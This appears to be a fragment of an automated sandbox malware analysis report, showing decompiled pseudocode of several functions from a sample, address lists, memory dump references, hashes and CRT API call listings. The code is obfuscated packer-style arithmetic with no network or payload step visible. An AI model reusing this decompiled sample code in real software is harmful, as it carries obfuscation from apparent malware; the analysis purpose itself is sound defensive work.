                                                                                                                                                                                                                                                                            						_t200 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *(_t200 + 0xbadbe5) = _a4[0x3d] ^  *(_t313 + 0x10c) ^ 0x00014d63 ^  *(_t199 + 0xbadbe5);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v32 <= _v20 + 0xd1) {
                                                                                                                                                                                                                                                                            						if(_v8 <= _v36 + 0x24c7) {
                                                                                                                                                                                                                                                                            							if(_v28 <= _v16 + 0x26e5 - _a4[0x26]) {
                                                                                                                                                                                                                                                                            								_v24 = _v28;
                                                                                                                                                                                                                                                                            								while(_v24 >= (_a4[0x19] | _a4[0x26]) - _a4[0x2d]) {
                                                                                                                                                                                                                                                                            									_v12 = (_a4[0xc] ^ 0x00002796) * _v12;
                                                                                                                                                                                                                                                                            									_t218 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            									_t114 = _t218 + 0xc8; // 0x38f7708d
                                                                                                                                                                                                                                                                            									_v20 = _v8 *  *_t114 & _v8 | _v20;
                                                                                                                                                                                                                                                                            									_t275 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            									_a4[0x2eb70c] = ( *(_t275 + 0xbadbf9) & _v12) * _a4[0x2eb70c];
                                                                                                                                                                                                                                                                            									_t278 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            									_t279 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            									 *(_t279 + 0xbadc39) = _v8 + 0x00002687 ^  *(_t278 + 0xbadc39);
                                                                                                                                                                                                                                                                            									_v16 = (_v32 | _a4[0xc]) & 0x00002801 ^ _v16;
                                                                                                                                                                                                                                                                            									_v12 = _v12 - (_v12 ^ 0x000027b9) + _v8;
                                                                                                                                                                                                                                                                            									_v24 = _v24 + 2;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t284 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_a4[0x2eb6f9] = ( *(_t284 + 0xac) ^ 0x000de529) + _a4[0x2eb6f9];
                                                                                                                                                                                                                                                                            							_v8 = _v8 ^ 0x0000002f;
                                                                                                                                                                                                                                                                            							_t184 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							 *_a4 =  *(_t184 + 0x6c) ^ 0x001dfdf1 |  *_a4;
                                                                                                                                                                                                                                                                            							if( *0x0040D4B4 == _a4[0x32]) {
                                                                                                                                                                                                                                                                            								_a4[0x2d] = ( *0x0040D48C - 0x20831) * _a4[0x2d];
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_a4[0x48] = _a4[0x2eb6f9] + _a4[0x13] + _a4[0x48] + 0x8fda0;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t293 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t83 = _t293 + 0xd0; // 0x33baa
                                                                                                                                                                                                                                                                            							_a4[0x48] = _a4[0x48] -  *_t83 + 0x10ad07;
                                                                                                                                                                                                                                                                            							_a4[0xa] = _a4[0xa] + 0x17216f;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v20 ^ 0x000001c1;
                                                                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                                                                            0x0038896f
                                                                                                                                                                                                                                                                            0x0038897b
                                                                                                                                                                                                                                                                            0x00388987
                                                                                                                                                                                                                                                                            0x00388992
                                                                                                                                                                                                                                                                            0x0038899e
                                                                                                                                                                                                                                                                            0x003889aa
                                                                                                                                                                                                                                                                            0x003889b5
                                                                                                                                                                                                                                                                            0x003889c1
                                                                                                                                                                                                                                                                            0x003889d0
                                                                                                                                                                                                                                                                            0x003889e0
                                                                                                                                                                                                                                                                            0x003889f5
                                                                                                                                                                                                                                                                            0x00388a02
                                                                                                                                                                                                                                                                            0x00388a1d
                                                                                                                                                                                                                                                                            0x00388a22
                                                                                                                                                                                                                                                                            0x00388a22
                                                                                                                                                                                                                                                                            0x00388a38
                                                                                                                                                                                                                                                                            0x00388a45
                                                                                                                                                                                                                                                                            0x00388aa4
                                                                                                                                                                                                                                                                            0x00388aaa
                                                                                                                                                                                                                                                                            0x00388a47
                                                                                                                                                                                                                                                                            0x00388a59
                                                                                                                                                                                                                                                                            0x00388a72
                                                                                                                                                                                                                                                                            0x00388a82
                                                                                                                                                                                                                                                                            0x00388a87
                                                                                                                                                                                                                                                                            0x00388a87
                                                                                                                                                                                                                                                                            0x00388abc
                                                                                                                                                                                                                                                                            0x00388acd
                                                                                                                                                                                                                                                                            0x00388c0d
                                                                                                                                                                                                                                                                            0x00388c16
                                                                                                                                                                                                                                                                            0x00388c24
                                                                                                                                                                                                                                                                            0x00388c54
                                                                                                                                                                                                                                                                            0x00388c57
                                                                                                                                                                                                                                                                            0x00388c60
                                                                                                                                                                                                                                                                            0x00388c6d
                                                                                                                                                                                                                                                                            0x00388c80
                                                                                                                                                                                                                                                                            0x00388ca3
                                                                                                                                                                                                                                                                            0x00388cbb
                                                                                                                                                                                                                                                                            0x00388cd0
                                                                                                                                                                                                                                                                            0x00388cd6
                                                                                                                                                                                                                                                                            0x00388cef
                                                                                                                                                                                                                                                                            0x00388d03
                                                                                                                                                                                                                                                                            0x00388c21
                                                                                                                                                                                                                                                                            0x00388c21
                                                                                                                                                                                                                                                                            0x00388c24
                                                                                                                                                                                                                                                                            0x00388ad3
                                                                                                                                                                                                                                                                            0x00388ae2
                                                                                                                                                                                                                                                                            0x00388b05
                                                                                                                                                                                                                                                                            0x00388b0f
                                                                                                                                                                                                                                                                            0x00388b1a
                                                                                                                                                                                                                                                                            0x00388b31
                                                                                                                                                                                                                                                                            0x00388b4a
                                                                                                                                                                                                                                                                            0x00388ba5
                                                                                                                                                                                                                                                                            0x00388b4c
                                                                                                                                                                                                                                                                            0x00388b7c
                                                                                                                                                                                                                                                                            0x00388b7c
                                                                                                                                                                                                                                                                            0x00388bab
                                                                                                                                                                                                                                                                            0x00388bb1
                                                                                                                                                                                                                                                                            0x00388bca
                                                                                                                                                                                                                                                                            0x00388bf0
                                                                                                                                                                                                                                                                            0x00388bf0
                                                                                                                                                                                                                                                                            0x00388acd
                                                                                                                                                                                                                                                                            0x00388abc
                                                                                                                                                                                                                                                                            0x00388d17

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e76b0e285a458786832a7e2179700e63c68081840502c428809ca322ab7dd947
                                                                                                                                                                                                                                                                            • Instruction ID: 84186cb870e1471f93af52977f53df99a4c0c76c1b3c74c4251b5599c495b501
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e76b0e285a458786832a7e2179700e63c68081840502c428809ca322ab7dd947
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2EC1D974A00205DFDB08CF58C594BAABBB2FB88344F5482B9D9499F795CB34E945CF84
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00373A60(signed int _a8, signed int _a16, intOrPtr _a20, signed int _a24) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                                                                                                                            				signed int* _v56;
                                                                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                                                                                                                            				intOrPtr _t150;
                                                                                                                                                                                                                                                                            				intOrPtr _t231;
                                                                                                                                                                                                                                                                            				intOrPtr _t271;
                                                                                                                                                                                                                                                                            				intOrPtr _t272;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v12 = _a24 - 0x2633;
                                                                                                                                                                                                                                                                            				_v32 = _a24 ^ 0x00000011;
                                                                                                                                                                                                                                                                            				_v8 = _a24 + 0x41;
                                                                                                                                                                                                                                                                            				_v28 = _a8 ^ 0x000026d4;
                                                                                                                                                                                                                                                                            				_v20 = _a16 ^ 0x00000356;
                                                                                                                                                                                                                                                                            				_v24 = _a24 + 0x54;
                                                                                                                                                                                                                                                                            				_v16 = _a24 + 0x163;
                                                                                                                                                                                                                                                                            				if(_v12 > (_v8 ^ 0x00000091)) {
                                                                                                                                                                                                                                                                            					_v12 = ( *(_a20 + 0xbadbc1) | 0x00002598) + _v12;
                                                                                                                                                                                                                                                                            					 *0x40d3d8 = _v16 | _v16 |  *0x40d3d8;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_a20 + 0x10c)) =  *((intOrPtr*)(_a20 + 0x10c)) - _v20 - _v8;
                                                                                                                                                                                                                                                                            					 *0x40d40c =  *(_a20 + 0xbadbb1) * _v32;
                                                                                                                                                                                                                                                                            					_t150 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_v8 = (_v12 + 0x000026d4 |  *(_t150 + 0xbadca9)) * _v8;
                                                                                                                                                                                                                                                                            					_v16 = _v16 - (_v24 ^  *(_a20 + 0xbadc91) | 0x00002628);
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v56 = 0x40d3a8;
                                                                                                                                                                                                                                                                            					_v52 = _v12 + 0x26e5;
                                                                                                                                                                                                                                                                            					_v48 = _v20;
                                                                                                                                                                                                                                                                            					_v44 = _v24 - 0x5f;
                                                                                                                                                                                                                                                                            					_v40 = _v24 + 0x17a;
                                                                                                                                                                                                                                                                            					_v36 = _v8 - 0x1ad;
                                                                                                                                                                                                                                                                            					_v8 = E00372940(_v56, _v52, _v48, _v44, _v40, _v36);
                                                                                                                                                                                                                                                                            					_v76 = _v28 + 0x2628;
                                                                                                                                                                                                                                                                            					_v72 = _v8 ^ 0x000003e3;
                                                                                                                                                                                                                                                                            					_v68 = _a20;
                                                                                                                                                                                                                                                                            					_v64 = _v12 + 0x2628;
                                                                                                                                                                                                                                                                            					_v60 = _v20 ^ 0x000000e7;
                                                                                                                                                                                                                                                                            					_v8 = E00371000(_v76, _v72, _v68, _v64, _v60);
                                                                                                                                                                                                                                                                            					_v24 = _v24 - 0x13;
                                                                                                                                                                                                                                                                            					_v96 = _v12 + 0x25a0;
                                                                                                                                                                                                                                                                            					_v92 = _v28 + 0x25a0;
                                                                                                                                                                                                                                                                            					_v88 = _v24 ^ 0x00000e4e;
                                                                                                                                                                                                                                                                            					_v84 = 0x40d3a8;
                                                                                                                                                                                                                                                                            					_v80 = _v32 + 6;
                                                                                                                                                                                                                                                                            					_v8 = E00372630(_v96, _v92, _v88, _v84, _v80);
                                                                                                                                                                                                                                                                            					_v32 = _v32 + 0x218;
                                                                                                                                                                                                                                                                            					_v12 = _v12 + 0x26e5;
                                                                                                                                                                                                                                                                            					_v8 = _v8 + 0x6b;
                                                                                                                                                                                                                                                                            					_v20 = _v20 ^ 0x00000e32;
                                                                                                                                                                                                                                                                            					_t271 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t81 = _t271 + 0xc8; // 0x38f7708d
                                                                                                                                                                                                                                                                            					_t231 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t82 = _t231 + 0xdc; // 0x6839923a
                                                                                                                                                                                                                                                                            					_t272 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					 *(_t272 + 0xdc) =  *((intOrPtr*)(_a20 + 0xe4)) -  *_t81 + 0x39004675 ^  *_t82;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(_v20 >= _v16 - 0x174 && _v28 <= _v12 - 0x1aa) {
                                                                                                                                                                                                                                                                            					_v16 = _v16 ^ 0x00000290;
                                                                                                                                                                                                                                                                            					_v28 = _v28 + 0x2506;
                                                                                                                                                                                                                                                                            					_v24 = _v24 - 0x52;
                                                                                                                                                                                                                                                                            					_v28 = _v28 ^ 0x000000a6;
                                                                                                                                                                                                                                                                            					_v16 = _v16 + 0x181;
                                                                                                                                                                                                                                                                            					_v8 = _v8 ^ 0x0000003b;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8 ^ 0x00000ebd;
                                                                                                                                                                                                                                                                            			}






























                                                                                                                                                                                                                                                                            0x00373a6e
                                                                                                                                                                                                                                                                            0x00373a77
                                                                                                                                                                                                                                                                            0x00373a80
                                                                                                                                                                                                                                                                            0x00373a8b
                                                                                                                                                                                                                                                                            0x00373a97
                                                                                                                                                                                                                                                                            0x00373aa0
                                                                                                                                                                                                                                                                            0x00373aab
                                                                                                                                                                                                                                                                            0x00373aba
                                                                                                                                                                                                                                                                            0x00373c55
                                                                                                                                                                                                                                                                            0x00373c64
                                                                                                                                                                                                                                                                            0x00373c8e
                                                                                                                                                                                                                                                                            0x00373ca8
                                                                                                                                                                                                                                                                            0x00373cbe
                                                                                                                                                                                                                                                                            0x00373cce
                                                                                                                                                                                                                                                                            0x00373cf0
                                                                                                                                                                                                                                                                            0x00373ac0
                                                                                                                                                                                                                                                                            0x00373ac0
                                                                                                                                                                                                                                                                            0x00373ad0
                                                                                                                                                                                                                                                                            0x00373ad6
                                                                                                                                                                                                                                                                            0x00373adf
                                                                                                                                                                                                                                                                            0x00373aeb
                                                                                                                                                                                                                                                                            0x00373af6
                                                                                                                                                                                                                                                                            0x00373b19
                                                                                                                                                                                                                                                                            0x00373b2b
                                                                                                                                                                                                                                                                            0x00373b36
                                                                                                                                                                                                                                                                            0x00373b3c
                                                                                                                                                                                                                                                                            0x00373b48
                                                                                                                                                                                                                                                                            0x00373b53
                                                                                                                                                                                                                                                                            0x00373b72
                                                                                                                                                                                                                                                                            0x00373b7b
                                                                                                                                                                                                                                                                            0x00373b87
                                                                                                                                                                                                                                                                            0x00373b93
                                                                                                                                                                                                                                                                            0x00373b9e
                                                                                                                                                                                                                                                                            0x00373ba1
                                                                                                                                                                                                                                                                            0x00373bae
                                                                                                                                                                                                                                                                            0x00373bcd
                                                                                                                                                                                                                                                                            0x00373bd9
                                                                                                                                                                                                                                                                            0x00373be5
                                                                                                                                                                                                                                                                            0x00373bee
                                                                                                                                                                                                                                                                            0x00373bfa
                                                                                                                                                                                                                                                                            0x00373c08
                                                                                                                                                                                                                                                                            0x00373c15
                                                                                                                                                                                                                                                                            0x00373c20
                                                                                                                                                                                                                                                                            0x00373c26
                                                                                                                                                                                                                                                                            0x00373c2c
                                                                                                                                                                                                                                                                            0x00373c32
                                                                                                                                                                                                                                                                            0x00373c32
                                                                                                                                                                                                                                                                            0x00373cff
                                                                                                                                                                                                                                                                            0x00373d17
                                                                                                                                                                                                                                                                            0x00373d23
                                                                                                                                                                                                                                                                            0x00373d2c
                                                                                                                                                                                                                                                                            0x00373d3e
                                                                                                                                                                                                                                                                            0x00373d49
                                                                                                                                                                                                                                                                            0x00373d52
                                                                                                                                                                                                                                                                            0x00373d52
                                                                                                                                                                                                                                                                            0x00373d60

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: a87ed9757d833d67e4e1496dc092e1b006cf2e67a76df5bda70fd246a3633b42
                                                                                                                                                                                                                                                                            • Instruction ID: 679e6d2e54c09b9db7dfe31d38643a6f8180fb3f8e875dcaf0973014e429dc00
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a87ed9757d833d67e4e1496dc092e1b006cf2e67a76df5bda70fd246a3633b42
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BA193B1E00109DFDB08CFD8D995AAEBBB1FF88304F548169E519AB385D734AA41CF94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E0037AE4D(intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                                                                            				intOrPtr* _t31;
                                                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                                                            				intOrPtr* _t46;
                                                                                                                                                                                                                                                                            				intOrPtr* _t47;
                                                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                                                            				intOrPtr* _t70;
                                                                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t74 = _a4;
                                                                                                                                                                                                                                                                            				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                                                                                                                                                                                                            				if(_t25 != 0 && _t25 != 0x40dae0) {
                                                                                                                                                                                                                                                                            					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                                                                                                                                                                                                            					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                                                                                                                                                                                                            						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                                                                                                                                                                                                            						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                                                                                                                                                                                                            							E0037A8FB(_t46);
                                                                                                                                                                                                                                                                            							E0037BCB5( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                                                                                                                                                                                                            						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                                                                                                                                                                                                            							E0037A8FB(_t47);
                                                                                                                                                                                                                                                                            							E0037BDB3( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						E0037A8FB( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                                                                                                                                                                                                            						E0037A8FB( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                                                                                                                                                                                                            				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                                                                                                                                                                                                            					E0037A8FB( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                                                                                                                                                                                                            					E0037A8FB( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                                                                                                                                                                                                            					E0037A8FB( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                                                                                                                                                                                                            					E0037A8FB( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E0037AFC0( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                                                                                                                                                                                                            				_t28 = 6;
                                                                                                                                                                                                                                                                            				_t55 = _t74 + 0xa0;
                                                                                                                                                                                                                                                                            				_v8 = _t28;
                                                                                                                                                                                                                                                                            				_t70 = _t74 + 0x28;
                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t70 - 8)) != 0x40d5a0) {
                                                                                                                                                                                                                                                                            						_t31 =  *_t70;
                                                                                                                                                                                                                                                                            						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                                                                                                                                                                                                            							E0037A8FB(_t31);
                                                                                                                                                                                                                                                                            							E0037A8FB( *_t55);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t28 = _v8;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                                                                                                                                                                                                            						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                                                                                                                                                                                                                            						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                                                                                                                                                                                                            							E0037A8FB(_t29);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t28 = _v8;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t55 = _t55 + 4;
                                                                                                                                                                                                                                                                            					_t70 = _t70 + 0x10;
                                                                                                                                                                                                                                                                            					_t28 = _t28 - 1;
                                                                                                                                                                                                                                                                            					_v8 = _t28;
                                                                                                                                                                                                                                                                            				} while (_t28 != 0);
                                                                                                                                                                                                                                                                            				return E0037A8FB(_t74);
                                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                                            0x0037ae55
                                                                                                                                                                                                                                                                            0x0037ae59
                                                                                                                                                                                                                                                                            0x0037ae61
                                                                                                                                                                                                                                                                            0x0037ae6a
                                                                                                                                                                                                                                                                            0x0037ae6f
                                                                                                                                                                                                                                                                            0x0037ae76
                                                                                                                                                                                                                                                                            0x0037ae7e
                                                                                                                                                                                                                                                                            0x0037ae86
                                                                                                                                                                                                                                                                            0x0037ae91
                                                                                                                                                                                                                                                                            0x0037ae97
                                                                                                                                                                                                                                                                            0x0037ae98
                                                                                                                                                                                                                                                                            0x0037aea0
                                                                                                                                                                                                                                                                            0x0037aea8
                                                                                                                                                                                                                                                                            0x0037aeb3
                                                                                                                                                                                                                                                                            0x0037aeb9
                                                                                                                                                                                                                                                                            0x0037aebd
                                                                                                                                                                                                                                                                            0x0037aec8
                                                                                                                                                                                                                                                                            0x0037aece
                                                                                                                                                                                                                                                                            0x0037ae6f
                                                                                                                                                                                                                                                                            0x0037aecf
                                                                                                                                                                                                                                                                            0x0037aed7
                                                                                                                                                                                                                                                                            0x0037aeea
                                                                                                                                                                                                                                                                            0x0037aefd
                                                                                                                                                                                                                                                                            0x0037af0b
                                                                                                                                                                                                                                                                            0x0037af16
                                                                                                                                                                                                                                                                            0x0037af1b
                                                                                                                                                                                                                                                                            0x0037af24
                                                                                                                                                                                                                                                                            0x0037af2c
                                                                                                                                                                                                                                                                            0x0037af2d
                                                                                                                                                                                                                                                                            0x0037af33
                                                                                                                                                                                                                                                                            0x0037af36
                                                                                                                                                                                                                                                                            0x0037af39
                                                                                                                                                                                                                                                                            0x0037af40
                                                                                                                                                                                                                                                                            0x0037af42
                                                                                                                                                                                                                                                                            0x0037af46
                                                                                                                                                                                                                                                                            0x0037af4e
                                                                                                                                                                                                                                                                            0x0037af55
                                                                                                                                                                                                                                                                            0x0037af5b
                                                                                                                                                                                                                                                                            0x0037af5c
                                                                                                                                                                                                                                                                            0x0037af5c
                                                                                                                                                                                                                                                                            0x0037af63
                                                                                                                                                                                                                                                                            0x0037af65
                                                                                                                                                                                                                                                                            0x0037af6a
                                                                                                                                                                                                                                                                            0x0037af72
                                                                                                                                                                                                                                                                            0x0037af77
                                                                                                                                                                                                                                                                            0x0037af78
                                                                                                                                                                                                                                                                            0x0037af78
                                                                                                                                                                                                                                                                            0x0037af7b
                                                                                                                                                                                                                                                                            0x0037af7e
                                                                                                                                                                                                                                                                            0x0037af81
                                                                                                                                                                                                                                                                            0x0037af84
                                                                                                                                                                                                                                                                            0x0037af84
                                                                                                                                                                                                                                                                            0x0037af96

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0037AE91
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BCD2
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BCE4
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BCF6
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BD08
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BD1A
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BD2C
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BD3E
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BD50
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BD62
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BD74
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BD86
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BD98
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BCB5: _free.LIBCMT ref: 0037BDAA
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037AE86
                                                                                                                                                                                                                                                                              • Part of subcall function 0037A8FB: HeapFree.KERNEL32(00000000,00000000,?,0037BE4A,?,00000000,?,00000000,?,0037BE71,?,00000007,?,?,0037AFE5,?), ref: 0037A911
                                                                                                                                                                                                                                                                              • Part of subcall function 0037A8FB: GetLastError.KERNEL32(?,?,0037BE4A,?,00000000,?,00000000,?,0037BE71,?,00000007,?,?,0037AFE5,?,?), ref: 0037A923
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037AEA8
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037AEBD
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037AEC8
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037AEEA
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037AEFD
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037AF0B
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037AF16
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037AF4E
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037AF55
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037AF72
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037AF8A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
